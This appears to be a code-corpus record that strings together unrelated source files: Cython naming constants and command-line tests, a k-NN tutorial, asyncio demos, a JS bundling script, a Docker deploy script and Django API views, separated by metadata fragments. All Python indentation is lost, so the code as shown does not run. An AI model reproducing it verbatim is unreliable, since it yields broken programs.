gstab_prefix = pyrex_prefix + "getsets_"
prop_get_prefix = pyrex_prefix + "getprop_"
const_prefix = pyrex_prefix + "k_"
py_const_prefix = pyrex_prefix + "kp_"
label_prefix = pyrex_prefix + "L"
pymethdef_prefix = pyrex_prefix + "mdef_"
method_wrapper_prefix = pyrex_prefix + "specialmethod_"
methtab_prefix = pyrex_prefix + "methods_"
memtab_prefix = pyrex_prefix + "members_"
objstruct_prefix = pyrex_prefix + "obj_"
typeptr_prefix = pyrex_prefix + "ptype_"
prop_set_prefix = pyrex_prefix + "setprop_"
type_prefix = pyrex_prefix + "t_"
typeobj_prefix = pyrex_prefix + "type_"
var_prefix = pyrex_prefix + "v_"
varptr_prefix = pyrex_prefix + "vp_"
varptr_prefix_api = pyrex_prefix + "api_vp_"
wrapperbase_prefix= pyrex_prefix + "wrapperbase_"
pybuffernd_prefix = pyrex_prefix + "pybuffernd_"
pybufferstruct_prefix = pyrex_prefix + "pybuffer_"
vtable_prefix = pyrex_prefix + "vtable_"
vtabptr_prefix = pyrex_prefix + "vtabptr_"
vtabstruct_prefix = pyrex_prefix + "vtabstruct_"
unicode_vtabentry_prefix = pyrex_prefix + "Uvtabentry_"
# vtab entries aren't normally manged,
# but punycode names sometimes start with numbers leading
# to a C syntax error
unicode_structmember_prefix = pyrex_prefix + "Umember_"
# as above -
# not normally manged but punycode names cause specific problems
opt_arg_prefix = pyrex_prefix + "opt_args_"
convert_func_prefix = pyrex_prefix + "convert_"
closure_scope_prefix = pyrex_prefix + "scope_"
closure_class_prefix = pyrex_prefix + "scope_struct_"
lambda_func_prefix = pyrex_prefix + "lambda_"
module_is_main = pyrex_prefix + "module_is_main_"
defaults_struct_prefix = pyrex_prefix + "defaults"
dynamic_args_cname = pyrex_prefix + "dynamic_args"
interned_prefixes = {
'str': pyrex_prefix + "n_",
'int': pyrex_prefix + "int_",
'float': pyrex_prefix + "float_",
'tuple': pyrex_prefix + "tuple_",
'codeobj': pyrex_prefix + "codeobj_",
'slice': pyrex_prefix + "slice_",
'ustring': pyrex_prefix + "ustring_",
'umethod': pyrex_prefix + "umethod_",
}
ctuple_type_prefix = pyrex_prefix + "ctuple_"
args_cname = pyrex_prefix + "args"
nargs_cname = pyrex_prefix + "nargs"
kwvalues_cname = pyrex_prefix + "kwvalues"
generator_cname = pyrex_prefix + "generator"
sent_value_cname = pyrex_prefix + "sent_value"
pykwdlist_cname = pyrex_prefix + "pyargnames"
obj_base_cname = pyrex_prefix + "base"
builtins_cname = pyrex_prefix + "b"
preimport_cname = pyrex_prefix + "i"
moddict_cname = pyrex_prefix + "d"
dummy_cname = pyrex_prefix + "dummy"
filename_cname = pyrex_prefix + "filename"
modulename_cname = pyrex_prefix + "modulename"
filetable_cname = pyrex_prefix + "f"
intern_tab_cname = pyrex_prefix + "intern_tab"
kwds_cname = pyrex_prefix + "kwds"
lineno_cname = pyrex_prefix + "lineno"
clineno_cname = pyrex_prefix + "clineno"
cfilenm_cname = pyrex_prefix + "cfilenm"
local_tstate_cname = pyrex_prefix + "tstate"
module_cname = pyrex_prefix + "m"
moddoc_cname = pyrex_prefix + "mdoc"
methtable_cname = pyrex_prefix + "methods"
retval_cname = pyrex_prefix + "r"
reqd_kwds_cname = pyrex_prefix + "reqd_kwds"
self_cname = pyrex_prefix + "self"
stringtab_cname = pyrex_prefix + "string_tab"
vtabslot_cname = pyrex_prefix + "vtab"
c_api_tab_cname = pyrex_prefix + "c_api_tab"
gilstate_cname = pyrex_prefix + "state"
skip_dispatch_cname = pyrex_prefix + "skip_dispatch"
empty_tuple = pyrex_prefix + "empty_tuple"
empty_bytes = pyrex_prefix + "empty_bytes"
empty_unicode = pyrex_prefix + "empty_unicode"
print_function = pyrex_prefix + "print"
print_function_kwargs = pyrex_prefix + "print_kwargs"
cleanup_cname = pyrex_prefix + "module_cleanup"
pymoduledef_cname = pyrex_prefix + "moduledef"
pymoduledef_slots_cname = pyrex_prefix + "moduledef_slots"
pymodinit_module_arg = pyrex_prefix + "pyinit_module"
pymodule_create_func_cname = pyrex_prefix + "pymod_create"
pymodule_exec_func_cname = pyrex_prefix + "pymod_exec"
optional_args_cname = pyrex_prefix + "optional_args"
import_star = pyrex_prefix + "import_star"
import_star_set = pyrex_prefix + "import_star_set"
outer_scope_cname= pyrex_prefix + "outer_scope"
cur_scope_cname = pyrex_prefix + "cur_scope"
enc_scope_cname = pyrex_prefix + "enc_scope"
frame_cname = pyrex_prefix + "frame"
frame_code_cname = pyrex_prefix + "frame_code"
binding_cfunc = pyrex_prefix + "binding_PyCFunctionType"
fused_func_prefix = pyrex_prefix + 'fuse_'
quick_temp_cname = pyrex_prefix + "temp" # temp variable for quick'n'dirty temping
tp_dict_version_temp = pyrex_prefix + "tp_dict_version"
obj_dict_version_temp = pyrex_prefix + "obj_dict_version"
type_dict_guard_temp = pyrex_prefix + "type_dict_guard"
cython_runtime_cname = pyrex_prefix + "cython_runtime"
global_code_object_cache_find = pyrex_prefix + 'find_code_object'
global_code_object_cache_insert = pyrex_prefix + 'insert_code_object'
genexpr_id_ref = 'genexpr'
freelist_name = 'freelist'
freecount_name = 'freecount'
line_c_macro = "__LINE__"
file_c_macro = "__FILE__"
extern_c_macro = pyrex_prefix.upper() + "EXTERN_C"
exc_type_name = pyrex_prefix + "exc_type"
exc_value_name = pyrex_prefix + "exc_value"
exc_tb_name = pyrex_prefix + "exc_tb"
exc_lineno_name = pyrex_prefix + "exc_lineno"
parallel_exc_type = pyrex_prefix + "parallel_exc_type"
parallel_exc_value = pyrex_prefix + "parallel_exc_value"
parallel_exc_tb = pyrex_prefix + "parallel_exc_tb"
parallel_filename = pyrex_prefix + "parallel_filename"
parallel_lineno = pyrex_prefix + "parallel_lineno"
parallel_clineno = pyrex_prefix + "parallel_clineno"
parallel_why = pyrex_prefix + "parallel_why"
exc_vars = (exc_type_name, exc_value_name, exc_tb_name)
api_name = pyrex_prefix + "capi__"
h_guard_prefix = "__PYX_HAVE__"
api_guard_prefix = "__PYX_HAVE_API__"
api_func_guard = "__PYX_HAVE_API_FUNC_"
PYX_NAN = "__PYX_NAN()"
def py_version_hex(major, minor=0, micro=0, release_level=0, release_serial=0):
return (major << 24) | (minor << 16) | (micro << 8) | (release_level << 4) | (release_serial)
```
#### File: Compiler/Tests/TestCmdLine.py
```python
import os
import sys
import copy
from unittest import TestCase
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
from .. import Options
from ..CmdLine import parse_command_line
class CmdLineParserTest(TestCase):
def setUp(self):
backup = {}
for name, value in vars(Options).items():
# we need a deep copy of _directive_defaults, because they can be changed
if name == '_directive_defaults':
value = copy.deepcopy(value)
backup[name] = value
self._options_backup = backup
def tearDown(self):
no_value = object()
for name, orig_value in self._options_backup.items():
if getattr(Options, name, no_value) != orig_value:
setattr(Options, name, orig_value)
# strip Options from new keys that might have been added:
for name in vars(Options).keys():
if name not in self._options_backup:
delattr(Options, name)
def check_default_global_options(self, white_list=[]):
no_value = object()
for name, orig_value in self._options_backup.items():
if name not in white_list:
self.assertEqual(getattr(Options, name, no_value), orig_value, msg="error in option " + name)
def check_default_options(self, options, white_list=[]):
default_options = Options.CompilationOptions(Options.default_options)
no_value = object()
for name in default_options.__dict__.keys():
if name not in white_list:
self.assertEqual(getattr(options, name, no_value), getattr(default_options, name), msg="error in option " + name)
def test_short_options(self):
options, sources = parse_command_line([
'-V', '-l', '-+', '-t', '-v', '-v', '-v', '-p', '-D', '-a', '-3',
])
self.assertFalse(sources)
self.assertTrue(options.show_version)
self.assertTrue(options.use_listing_file)
self.assertTrue(options.cplus)
self.assertTrue(options.timestamps)
self.assertTrue(options.verbose >= 3)
self.assertTrue(Options.embed_pos_in_docstring)
self.assertFalse(Options.docstrings)
self.assertTrue(Options.annotate)
self.assertEqual(options.language_level, 3)
options, sources = parse_command_line([
'-f', '-2', 'source.pyx',
])
self.assertTrue(sources)
self.assertTrue(len(sources) == 1)
self.assertFalse(options.timestamps)
self.assertEqual(options.language_level, 2)
def test_long_options(self):
options, sources = parse_command_line([
'--version', '--create-listing', '--cplus', '--embed', '--timestamps',
'--verbose', '--verbose', '--verbose',
'--embed-positions', '--no-docstrings', '--annotate', '--lenient',
])
self.assertFalse(sources)
self.assertTrue(options.show_version)
self.assertTrue(options.use_listing_file)
self.assertTrue(options.cplus)
self.assertEqual(Options.embed, 'main')
self.assertTrue(options.timestamps)
self.assertTrue(options.verbose >= 3)
self.assertTrue(Options.embed_pos_in_docstring)
self.assertFalse(Options.docstrings)
self.assertTrue(Options.annotate)
self.assertFalse(Options.error_on_unknown_names)
self.assertFalse(Options.error_on_uninitialized)
options, sources = parse_command_line([
'--force', 'source.pyx',
])
self.assertTrue(sources)
self.assertTrue(len(sources) == 1)
self.assertFalse(options.timestamps)
def test_options_with_values(self):
options, sources = parse_command_line([
'--embed=huhu',
'-I/test/include/dir1', '--include-dir=/test/include/dir2',
'--include-dir', '/test/include/dir3',
'--working=/work/dir',
'source.pyx',
'--output-file=/output/dir',
'--pre-import=/pre/import',
'--cleanup=3',
'--annotate-coverage=cov.xml',
'--gdb-outdir=/gdb/outdir',
'--directive=wraparound=false',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'huhu')
self.assertEqual(options.include_path, ['/test/include/dir1', '/test/include/dir2', '/test/include/dir3'])
self.assertEqual(options.working_path, '/work/dir')
self.assertEqual(options.output_file, '/output/dir')
self.assertEqual(Options.pre_import, '/pre/import')
self.assertEqual(Options.generate_cleanup_code, 3)
self.assertTrue(Options.annotate)
self.assertEqual(Options.annotate_coverage_xml, 'cov.xml')
self.assertTrue(options.gdb_debug)
self.assertEqual(options.output_dir, '/gdb/outdir')
self.assertEqual(options.compiler_directives['wraparound'], False)
def test_embed_before_positional(self):
options, sources = parse_command_line([
'--embed',
'source.pyx',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'main')
def test_two_embeds(self):
options, sources = parse_command_line([
'--embed', '--embed=huhu',
'source.pyx',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'huhu')
def test_two_embeds2(self):
options, sources = parse_command_line([
'--embed=huhu', '--embed',
'source.pyx',
])
self.assertEqual(sources, ['source.pyx'])
self.assertEqual(Options.embed, 'main')
def test_no_annotate(self):
options, sources = parse_command_line([
'--embed=huhu', 'source.pyx'
])
self.assertFalse(Options.annotate)
def test_annotate_short(self):
options, sources = parse_command_line([
'-a',
'source.pyx',
])
self.assertEqual(Options.annotate, 'default')
def test_annotate_long(self):
options, sources = parse_command_line([
'--annotate',
'source.pyx',
])
self.assertEqual(Options.annotate, 'default')
def test_annotate_fullc(self):
options, sources = parse_command_line([
'--annotate-fullc',
'source.pyx',
])
self.assertEqual(Options.annotate, 'fullc')
def test_short_w(self):
options, sources = parse_command_line([
'-w', 'my_working_path',
'source.pyx'
])
self.assertEqual(options.working_path, 'my_working_path')
self.check_default_global_options()
self.check_default_options(options, ['working_path'])
def test_short_o(self):
options, sources = parse_command_line([
'-o', 'my_output',
'source.pyx'
])
self.assertEqual(options.output_file, 'my_output')
self.check_default_global_options()
self.check_default_options(options, ['output_file'])
def test_short_z(self):
options, sources = parse_command_line([
'-z', 'my_preimport',
'source.pyx'
])
self.assertEqual(Options.pre_import, 'my_preimport')
self.check_default_global_options(['pre_import'])
self.check_default_options(options)
def test_convert_range(self):
options, sources = parse_command_line([
'--convert-range',
'source.pyx'
])
self.assertEqual(Options.convert_range, True)
self.check_default_global_options(['convert_range'])
self.check_default_options(options)
def test_line_directives(self):
options, sources = parse_command_line([
'--line-directives',
'source.pyx'
])
self.assertEqual(options.emit_linenums, True)
self.check_default_global_options()
self.check_default_options(options, ['emit_linenums'])
def test_no_c_in_traceback(self):
options, sources = parse_command_line([
'--no-c-in-traceback',
'source.pyx'
])
self.assertEqual(options.c_line_in_traceback, False)
self.check_default_global_options()
self.check_default_options(options, ['c_line_in_traceback'])
def test_gdb(self):
options, sources = parse_command_line([
'--gdb',
'source.pyx'
])
self.assertEqual(options.gdb_debug, True)
self.assertEqual(options.output_dir, os.curdir)
self.check_default_global_options()
self.check_default_options(options, ['gdb_debug', 'output_dir'])
def test_3str(self):
options, sources = parse_command_line([
'--3str',
'source.pyx'
])
self.assertEqual(options.language_level, '3str')
self.check_default_global_options()
self.check_default_options(options, ['language_level'])
def test_capi_reexport_cincludes(self):
options, sources = parse_command_line([
'--capi-reexport-cincludes',
'source.pyx'
])
self.assertEqual(options.capi_reexport_cincludes, True)
self.check_default_global_options()
self.check_default_options(options, ['capi_reexport_cincludes'])
def test_fast_fail(self):
options, sources = parse_command_line([
'--fast-fail',
'source.pyx'
])
self.assertEqual(Options.fast_fail, True)
self.check_default_global_options(['fast_fail'])
self.check_default_options(options)
def test_cimport_from_pyx(self):
options, sources = parse_command_line([
'--cimport-from-pyx',
'source.pyx'
])
self.assertEqual(Options.cimport_from_pyx, True)
self.check_default_global_options(['cimport_from_pyx'])
self.check_default_options(options)
def test_Werror(self):
options, sources = parse_command_line([
'-Werror',
'source.pyx'
])
self.assertEqual(Options.warning_errors, True)
self.check_default_global_options(['warning_errors'])
self.check_default_options(options)
def test_warning_errors(self):
options, sources = parse_command_line([
'--warning-errors',
'source.pyx'
])
self.assertEqual(Options.warning_errors, True)
self.check_default_global_options(['warning_errors'])
self.check_default_options(options)
def test_Wextra(self):
options, sources = parse_command_line([
'-Wextra',
'source.pyx'
])
self.assertEqual(options.compiler_directives, Options.extra_warnings)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_warning_extra(self):
options, sources = parse_command_line([
'--warning-extra',
'source.pyx'
])
self.assertEqual(options.compiler_directives, Options.extra_warnings)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_old_style_globals(self):
options, sources = parse_command_line([
'--old-style-globals',
'source.pyx'
])
self.assertEqual(Options.old_style_globals, True)
self.check_default_global_options(['old_style_globals'])
self.check_default_options(options)
def test_directive_multiple(self):
options, source = parse_command_line([
'-X', 'cdivision=True',
'-X', 'c_string_type=bytes',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], True)
self.assertEqual(options.compiler_directives['c_string_type'], 'bytes')
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_multiple_v2(self):
options, source = parse_command_line([
'-X', 'cdivision=True,c_string_type=bytes',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], True)
self.assertEqual(options.compiler_directives['c_string_type'], 'bytes')
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_value_yes(self):
options, source = parse_command_line([
'-X', 'cdivision=YeS',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], True)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_value_no(self):
options, source = parse_command_line([
'-X', 'cdivision=no',
'source.pyx'
])
self.assertEqual(options.compiler_directives['cdivision'], False)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_directive_value_invalid(self):
self.assertRaises(ValueError, parse_command_line, [
'-X', 'cdivision=sadfasd',
'source.pyx'
])
def test_directive_key_invalid(self):
self.assertRaises(ValueError, parse_command_line, [
'-X', 'abracadabra',
'source.pyx'
])
def test_directive_no_value(self):
self.assertRaises(ValueError, parse_command_line, [
'-X', 'cdivision',
'source.pyx'
])
def test_compile_time_env_short(self):
options, source = parse_command_line([
'-E', 'MYSIZE=10',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_compile_time_env_long(self):
options, source = parse_command_line([
'--compile-time-env', 'MYSIZE=10',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_compile_time_env_multiple(self):
options, source = parse_command_line([
'-E', 'MYSIZE=10', '-E', 'ARRSIZE=11',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.assertEqual(options.compile_time_env['ARRSIZE'], 11)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_compile_time_env_multiple_v2(self):
options, source = parse_command_line([
'-E', 'MYSIZE=10,ARRSIZE=11',
'source.pyx'
])
self.assertEqual(options.compile_time_env['MYSIZE'], 10)
self.assertEqual(options.compile_time_env['ARRSIZE'], 11)
self.check_default_global_options()
self.check_default_options(options, ['compile_time_env'])
def test_option_first(self):
options, sources = parse_command_line(['-V', 'file.pyx'])
self.assertEqual(sources, ['file.pyx'])
def test_file_inbetween(self):
options, sources = parse_command_line(['-V', 'file.pyx', '-a'])
self.assertEqual(sources, ['file.pyx'])
def test_option_trailing(self):
options, sources = parse_command_line(['file.pyx', '-V'])
self.assertEqual(sources, ['file.pyx'])
def test_multiple_files(self):
options, sources = parse_command_line([
'file1.pyx', '-V',
'file2.pyx', '-a',
'file3.pyx'
])
self.assertEqual(sources, ['file1.pyx', 'file2.pyx', 'file3.pyx'])
def test_debug_flags(self):
options, sources = parse_command_line([
'--debug-disposal-code', '--debug-coercion',
'file3.pyx'
])
from Cython.Compiler import DebugFlags
for name in ['debug_disposal_code', 'debug_temp_alloc', 'debug_coercion']:
self.assertEqual(getattr(DebugFlags, name), name in ['debug_disposal_code', 'debug_coercion'])
setattr(DebugFlags, name, 0) # restore original value
def test_gdb_overwrites_gdb_outdir(self):
options, sources = parse_command_line([
'--gdb-outdir=my_dir', '--gdb',
'file3.pyx'
])
self.assertEqual(options.gdb_debug, True)
self.assertEqual(options.output_dir, os.curdir)
self.check_default_global_options()
self.check_default_options(options, ['gdb_debug', 'output_dir'])
def test_gdb_first(self):
options, sources = parse_command_line([
'--gdb', '--gdb-outdir=my_dir',
'file3.pyx'
])
self.assertEqual(options.gdb_debug, True)
self.assertEqual(options.output_dir, 'my_dir')
self.check_default_global_options()
self.check_default_options(options, ['gdb_debug', 'output_dir'])
def test_coverage_overwrites_annotation(self):
options, sources = parse_command_line([
'--annotate-fullc', '--annotate-coverage=my.xml',
'file3.pyx'
])
self.assertEqual(Options.annotate, True)
self.assertEqual(Options.annotate_coverage_xml, 'my.xml')
self.check_default_global_options(['annotate', 'annotate_coverage_xml'])
self.check_default_options(options)
def test_coverage_first(self):
options, sources = parse_command_line([
'--annotate-coverage=my.xml', '--annotate-fullc',
'file3.pyx'
])
self.assertEqual(Options.annotate, 'fullc')
self.assertEqual(Options.annotate_coverage_xml, 'my.xml')
self.check_default_global_options(['annotate', 'annotate_coverage_xml'])
self.check_default_options(options)
def test_annotate_first_fullc_second(self):
options, sources = parse_command_line([
'--annotate', '--annotate-fullc',
'file3.pyx'
])
self.assertEqual(Options.annotate, 'fullc')
self.check_default_global_options(['annotate'])
self.check_default_options(options)
def test_annotate_fullc_first(self):
options, sources = parse_command_line([
'--annotate-fullc', '--annotate',
'file3.pyx'
])
self.assertEqual(Options.annotate, 'default')
self.check_default_global_options(['annotate'])
self.check_default_options(options)
def test_warning_extra_dont_overwrite(self):
options, sources = parse_command_line([
'-X', 'cdivision=True',
'--warning-extra',
'-X', 'c_string_type=bytes',
'source.pyx'
])
self.assertTrue(len(options.compiler_directives), len(Options.extra_warnings) + 1)
self.check_default_global_options()
self.check_default_options(options, ['compiler_directives'])
def test_errors(self):
def error(*args):
old_stderr = sys.stderr
stderr = sys.stderr = StringIO()
try:
self.assertRaises(SystemExit, parse_command_line, list(args))
finally:
sys.stderr = old_stderr
self.assertTrue(stderr.getvalue())
error('-1')
error('-I')
error('--version=-a')
error('--version=--annotate=true')
error('--working')
error('--verbose=1')
error('--verbose=1')
error('--cleanup')
error('--debug-disposal-code-wrong-name', 'file3.pyx')
``` |
{
"source": "JimmyFW/stop-making-sense-julia",
"score": 3
} |
#### File: JimmyFW/stop-making-sense-julia/knn_python_custom_tutorial.py
```python
import pandas as pd
from skimage.io import imread
import numpy as np
def read_data(typeData, labelsInfo, imageSize, path):
#Intialize x matrix
x = np.zeros((labelsInfo.shape[0], imageSize))
for (index, idImage) in enumerate(labelsInfo["ID"]):
#Read image file
nameFile = "{0}/{1}Resized/{2}.Bmp".format(path, typeData, idImage)
img = imread(nameFile, as_grey=True)
x[index, :] = np.reshape(img, (1, imageSize))
return x
imageSize = 400 # 20 x 20 pixels
#Set location of data files , folders
path = ...
labelsInfoTrain = pd.read_csv("{0}/trainLabels.csv".format(path))
#Read training matrix
xTrain = read_data("train", labelsInfoTrain, imageSize, path)
#Read information about test data ( IDs ).
labelsInfoTest = pd.read_csv("{0}/sampleSubmission.csv".format(path))
#Read test matrix
xTest = read_data("test", labelsInfoTest, imageSize, path)
yTrain = map(ord, labelsInfoTrain["Class"])
# Defining main functions
def euclidean_distance (a, b):
dif = a - b
return dif.dot(dif)
def get_k_nearest_neighbors(x, i, k):
imageI = x[i,:]
distances = [euclidean_distance(imageI, x[j,:]) for j in xrange(x.shape[0])]
sortedNeighbors = np.argsort(distances)
kNearestNeighbors = sortedNeighbors[1:(k+1)]
return kNearestNeighbors
def assign_label(x, y, k, i):
kNearestNeighbors = get_k_nearest_neighbors(x, i, k)
counts = {}
highestCount = 0
mostPopularLabel = 0
for n in kNearestNeighbors:
labelOfN = y[n]
if labelOfN not in counts :
counts[labelOfN] = 0
counts[labelOfN] += 1
if counts[labelOfN] > highestCount :
highestCount = counts[labelOfN]
mostPopularLabel = labelOfN
return mostPopularLabel
# Running LOOF-CV with 1NN sequentially
import time
start = time.time()
k=1
yPredictions = [assign_label(xTrain, yTrain, k, i) for i in xrange(xTrain.shape[0])]
print time.time() - start, "seconds elapsed"
``` |
{
"source": "jimmygizmo/zerogames",
"score": 3
} |
#### File: zerogames/medusa/duet-asyncawait.py
```python
import asyncio
# showing asyncio async await
async def annie():
print('Anything you can do, I can do better.')
print(' I can do anything better than you.')
await frank()
print('Yes, I can!')
await frank()
print('Yes, I can!')
await frank()
print('Yes, I ca. Yes, I can!')
async def frank():
print("No, you can't!")
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.ensure_future(annie()))
##
#
```
#### File: zerogames/medusa/xmedusa.py
```python
import asyncio
import random
async def mainCoroutineSimple():
print('Simple coroutine')
async def mainCoroutineFancy(id):
process_time = random.randint(1,5)
await asyncio.sleep(process_time)
print(f"Fancy coroutine: {id} done after {process_time} seconds.")
async def mainCoroutineMarvelous():
print('Marvelous coroutine')
async def main():
tasks = []
for i in range(10):
tasks.append(asyncio.ensure_future(mainCoroutineFancy(i)))
await asyncio.gather(*tasks)
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
loop.close()
##
#
``` |
{
"source": "JimmyHaglund/JHM_Javascript_Game_Engine",
"score": 3
} |
#### File: Caprica/Source/Build.py
```python
import os
from os import walk
def bundle(root, outfile):
contents = walk(root)
open(outfile, 'w+').close()
add_files_in_directory(root, outfile)
for root, dirs, files in contents:
for dir in dirs:
print("\n" + dir)
path = os.path.join(root, dir)
add_files_in_directory(path, outfile)
def add_files_in_directory(dirpath, outpath):
dependents = []
readfiles = []
with open(outpath, "a") as outfile:
for filename in os.listdir(dirpath):
if filename[-2:] != "js":
continue
path = os.path.join(dirpath, filename)
if (has_unresolved_dependency(path, readfiles)):
print("Unresolved dependency for file " + filename)
dependents.append(path)
continue
contents = read_file(path)
print("Reading " + filename)
outfile.write(contents + "\n")
readfiles.append(filename[:-3])
add_dependents(dependents, readfiles, outpath)
def add_dependents(dependents, readfiles, outpath):
if (dependents.count == 0):
return
with open(outpath, "a") as outfile:
for dependentpath in dependents:
filename = os.path.basename(dependentpath)
if (has_unresolved_dependency(dependentpath, readfiles)):
print("Still unresolved dependency for " + filename)
continue
contents = read_file(dependentpath)
print("Reading " + filename)
outfile.write(contents + "\n")
readfiles.append(filename[-3:])
dependents.remove(dependentpath)
def has_unresolved_dependency(path, readfiles):
with open (path, "r") as file:
dependencydeclaration = file.readline()
dependencies = get_dependencies(dependencydeclaration)
return dependency_unresolved(dependencies, readfiles)
def dependency_unresolved(dependencies, readfiles):
for dependency in dependencies:
if dependency not in readfiles:
return 1
return 0
def read_file(file_path):
with open(file_path, 'r') as target:
return target.read()
def get_dependencies(dependencystring):
items = dependencystring.split()
if not "Dependencies:" in items:
return []
items.remove("//")
items.remove("Dependencies:")
return items
if __name__ == '__main__':
os.system('cmd /c tsc')
bundle('./Js', '../Scripts/Caprica.js')
``` |
{
"source": "jimmyharris/pyrex",
"score": 2
} |
#### File: pyrex/ci/deploy_docker.py
```python
import argparse
import os
import requests
import subprocess
import sys
def main():
parser = argparse.ArgumentParser(description='Deploy docker images')
parser.add_argument('--login', action='store_true', help='Login to Dockerhub using the environment variables $DOCKER_USERNAME and $DOCKER_PASSWORD')
parser.add_argument('image', metavar='IMAGE[:TAG]', help='The image to build and push')
args = parser.parse_args()
this_dir = os.path.abspath(os.path.dirname(sys.argv[0]))
docker_dir = os.path.join(this_dir, '..', 'docker')
image = args.image
if ':' in image:
image, tag = image.split(':', 1)
elif 'TRAVIS_TAG' in os.environ:
tag = os.environ['TRAVIS_TAG'] or 'latest'
else:
tag = 'latest'
repo = 'garminpyrex/%s' % image
name = '%s:%s' % (repo, tag)
if args.login:
print("Logging in...")
for v in ('DOCKER_USERNAME', 'DOCKER_PASSWORD'):
if v not in os.environ:
print("$%s is missing from the environment. Images will not be deployed" % v)
return 0
with subprocess.Popen(['docker', 'login', '--username', os.environ['DOCKER_USERNAME'], '--password-stdin'], stdin=subprocess.PIPE) as p:
try:
p.communicate(os.environ['DOCKER_PASSWORD'].encode('utf-8'), timeout=60)
except subprocess.TimeoutExpired:
print("Docker login timed out")
p.kill()
p.communicate()
if p.returncode != 0:
print("Docker login failed. Images will not be deployed")
return 0
print("Deploying %s..." % name)
# Get a login token for the docker registry and download the manifest
token = requests.get("https://auth.docker.io/token?service=registry.docker.io&scope=repository:%s:pull" % repo, json=True).json()["token"]
manifest = requests.get(
"https://registry.hub.docker.com/v2/%s/manifests/%s" % (repo, tag),
headers={"Authorization": "Bearer %s" % token},
json=True
).json()
found_manifest = (manifest.get('name', '') == repo)
# Only 'latest' and 'next' tags are allowed to be overwritten
if found_manifest and tag != 'latest' and tag != 'next':
print("Tag '%s' already exists. Refusing to push" % tag)
return 1
print("Building", name)
try:
subprocess.check_call(['docker', 'build', '-t', name, '-f', '%s/Dockerfile' % docker_dir,
'--build-arg', 'PYREX_BASE=%s' % image, '--', docker_dir])
except subprocess.CalledProcessError as e:
print("Building failed!")
return 1
print("Testing", name)
try:
env = os.environ.copy()
env['TEST_IMAGE'] = image
env['TEST_PREBUILT_TAG'] = tag
subprocess.check_call(['%s/test.py' % this_dir, '-vbf'], env=env, cwd=os.path.join(this_dir, '..'))
except subprocess.CalledProcessError as e:
print("Testing failed!")
return 1
print("Pushing", name)
try:
subprocess.check_call(['docker', 'push', name])
except subprocess.CalledProcessError as e:
print("Pushing failed!")
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "jimmyhealer/NTOUvoteplatformBackEnd",
"score": 2
} |
#### File: NTOUvoteplatformBackEnd/announcement/views.py
```python
from announcement.models import Announcement
from announcement.serializers import AnnouncementSerializer
from votebd.core.decorators import login_required
from utils.api import APIView, validate_serializer
class AnnouncementList(APIView):
"""
List all code snippets, or create a new snippet.
"""
def get(self, request):
announcement = Announcement.objects.all()
data = self.paginate_data(request, announcement, AnnouncementSerializer)
return self.success(data = data)
#@validate_serializer(AnnouncementSerializer)
@login_required
def post(self, request):
serializer = AnnouncementSerializer(data = request.data)
if serializer.is_valid():
serializer.save(author = request.user)
return self.success(data = serializer.data, status = 201)
return self.error(msg = serializer.errors, status = 400)
class AnnouncementDetail(APIView):
"""
Retrieve, update or delete a code Announcement.
"""
def get_object(self, pk):
try:
return Announcement.objects.get(pk = pk)
except Announcement.DoesNotExist:
return self.error(status = 404)
def get(self, request, pk, format = None):
announcement = self.get_object(pk)
serializer = AnnouncementSerializer(announcement)
return self.success(data = serializer.data)
@login_required
def put(self, request, pk, format = None):
announcement = self.get_object(pk)
serializer = AnnouncementSerializer(announcement, data = request.data)
if serializer.is_valid():
serializer.save()
return self.success(data = serializer.data)
return self.error(msg = serializer.errors, status = 400)
@login_required
def delete(self, request, pk, format = None):
announcement = self.get_object(pk)
announcement.delete()
return self.success(status = 204)
```
#### File: votebd/core/decorators.py
```python
import functools
from rest_framework.response import Response
class BasePermissionDecorator(object):
def __init__(self, func):
self.func = func
def __get__(self, obj, obj_type):
return functools.partial(self.__call__, obj)
def error(self, data):
return Response({"error": "permission-denied", "data": data, 'status': 403})
def __call__(self, *args, **kwargs):
self.request = args[1]
if self.check_permission():
# if self.request.user.is_active:
# return self.error("Your account is disabled")
return self.func(*args, **kwargs)
else:
return self.error("Please login first")
def check_permission(self):
raise NotImplementedError()
class login_required(BasePermissionDecorator):
def check_permission(self):
return self.request.user.is_authenticated
```
#### File: NTOUvoteplatformBackEnd/voteEvent/views.py
```python
from utils.api import APIView, validate_serializer
from votebd.core.decorators import login_required
from voteEvent.serializers import VoteEventSerializer
from voteEvent.models import VoteEvent
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
class VoteEventList(APIView):
def get(self, request):
publish_voteEvents = VoteEvent.objects.filter(published__lte = timezone.now())
for publish_voteEvent in publish_voteEvents:
publish_voteEvent.publish_post()
publish_voteEvent.save()
voteEvents = VoteEvent.objects.all()
data = self.paginate_data(request, voteEvents, VoteEventSerializer)
return self.success(data = data)
#@validate_serializer(VoteEventSerializer)
@login_required
def post(self, request):
serializer = VoteEventSerializer(data = request.data)
if serializer.is_valid():
serializer.save(author = request.user)
return self.success(data = serializer.data, status = 201)
return self.error(msg = serializer.errors, status = 400)
